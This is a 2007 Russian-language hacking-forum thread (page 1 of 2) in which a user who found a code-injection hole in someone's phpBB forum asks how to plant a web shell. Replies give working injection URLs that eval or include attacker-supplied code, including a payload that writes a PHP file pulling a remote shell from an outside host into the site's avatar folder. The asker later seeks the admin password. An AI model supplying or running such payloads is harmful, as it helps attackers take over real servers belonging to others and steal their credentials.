ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу phpBB платформа WIND помогите с shell
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

phpBB платформа WIND помогите с shell
  #1  
Старый 14.02.2007, 14:39
Student :)
Участник форума
Регистрация: 09.02.2007
Сообщений: 202
Провел на форуме:
537148

Репутация: 9
Отправить сообщение для Student :) с помощью ICQ
Red face phpBB платформа WIND помогите с shell
ДОрогие друзья я нашол форум с дырой
по запросу
http://сайт/forum/viewtopic.php?t=161&cmd=phpinfo();&highlight='.eva l($HTTP_GET_VARS[cmd]).'
phpinfo выдал
система System Windows NT SUPPORT 5.0 build 2195
FTP support enabled
PATH_TRANSLATED D:\www\www2\forum\viewtopic.php
SystemRoot C:\WINNT
TEMP C:\WINNT\TEMP
TMP C:\WINNT\TEMP
USERPROFILE C:\Documents and Settings\Default User
windir C:\WINNT

MySQL Support enabled
Active Persistent Links 0
Active Links 1
Client API version 3.23.49


возможно ли залить шелл и если да то как помогите пожалуйста
 
Ответить с цитированием

  #2  
Старый 14.02.2007, 15:27
x0x01
Познающий
Регистрация: 19.10.2006
Сообщений: 39
Провел на форуме:
70033

Репутация: 17
По умолчанию
это тебе поможет хттп://exploit.in/forum/index.php?showtopic=5165
 
Ответить с цитированием

  #3  
Старый 14.02.2007, 15:35
Student :)
Участник форума
Регистрация: 09.02.2007
Сообщений: 202
Провел на форуме:
537148

Репутация: 9
Отправить сообщение для Student :) с помощью ICQ
По умолчанию
А если попробывать такой командой?
http://site/forum/viewtopic.php?t=161&cmd=http://eraserevil.pp.net.ua/_ld/0/87_SiJ.txt&highlight='.include($HTTP_GET_VARS[cmd]).'
 
Ответить с цитированием

  #4  
Старый 14.02.2007, 16:29
Student :)
Участник форума
Регистрация: 09.02.2007
Сообщений: 202
Провел на форуме:
537148

Репутация: 9
Отправить сообщение для Student :) с помощью ICQ
По умолчанию
к сожелению команда http://site/forum/viewtopic.php?t=161&cmd=http://eraserevil.pp.net.ua/_ld/0/87_SiJ.txt&highlight='.include($HTTP_GET_VARS[cmd]).'
не работает
 
Ответить с цитированием

  #5  
Старый 14.02.2007, 18:09
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию
Ты можешь команды чтоль на сервере исполнять или что?
 
Ответить с цитированием

  #6  
Старый 15.02.2007, 09:34
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию
пробуй сразу
http://сайт/forum/viewtopic.php?t=161&cmd=echo ^<? @include(http://site.ru/youshell.php); ?^> >> fuck.php&highlight='.eval($HTTP_GET_VARS[cmd]).'

либо для твоего случая можно попробовать в папку с авами закинуть

http://сайт/forum/viewtopic.php?t=161&cmd=echo ^<? @include(http://site.ru/youshell.php); ?^> >> D:\www\www2\forum\images\avatars\fuck.php&highlight='.eval($HTTP_GET_VARS[cmd]).'

обязательно с символом ^
если что не получится пиши сюда.
__________________
ПИУ-ПИУ...
 
Ответить с цитированием

  #7  
Старый 15.02.2007, 11:46
Student :)
Участник форума
Регистрация: 09.02.2007
Сообщений: 202
Провел на форуме:
537148

Репутация: 9
Отправить сообщение для Student :) с помощью ICQ
По умолчанию
Спосибо тебе за ответ! но я всё перепробывал что ты сказал пишет
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
 
Ответить с цитированием

  #8  
Старый 15.02.2007, 11:48
Student :)
Участник форума
Регистрация: 09.02.2007
Сообщений: 202
Провел на форуме:
537148

Репутация: 9
Отправить сообщение для Student :) с помощью ICQ
По умолчанию
может кто поможет, главное phpinfo работает!
моя icq 997-253
 
Ответить с цитированием

  #9  
Старый 15.02.2007, 12:13
Student :)
Участник форума
Регистрация: 09.02.2007
Сообщений: 202
Провел на форуме:
537148

Репутация: 9
Отправить сообщение для Student :) с помощью ICQ
По умолчанию
а можно хотябы узнать пароль админа на форум ?
 
Ответить с цитированием

  #10  
Старый 16.02.2007, 14:19
SSSetuPPP
Познающий
Регистрация: 22.01.2007
Сообщений: 32
Провел на форуме:
214445

Репутация: 0
Cool
А какая версия форума?
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48
ПоМоГиТе! ПЛЗ!!! farik.aka E-Mail 1 17.09.2006 13:00
Помогите подменить куки для phpBB. AntiPhp Форумы 16 09.02.2006 04:26
Помогите слить базу с phpBB 2.0.8 stalles Форумы 5 16.01.2006 09:58



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ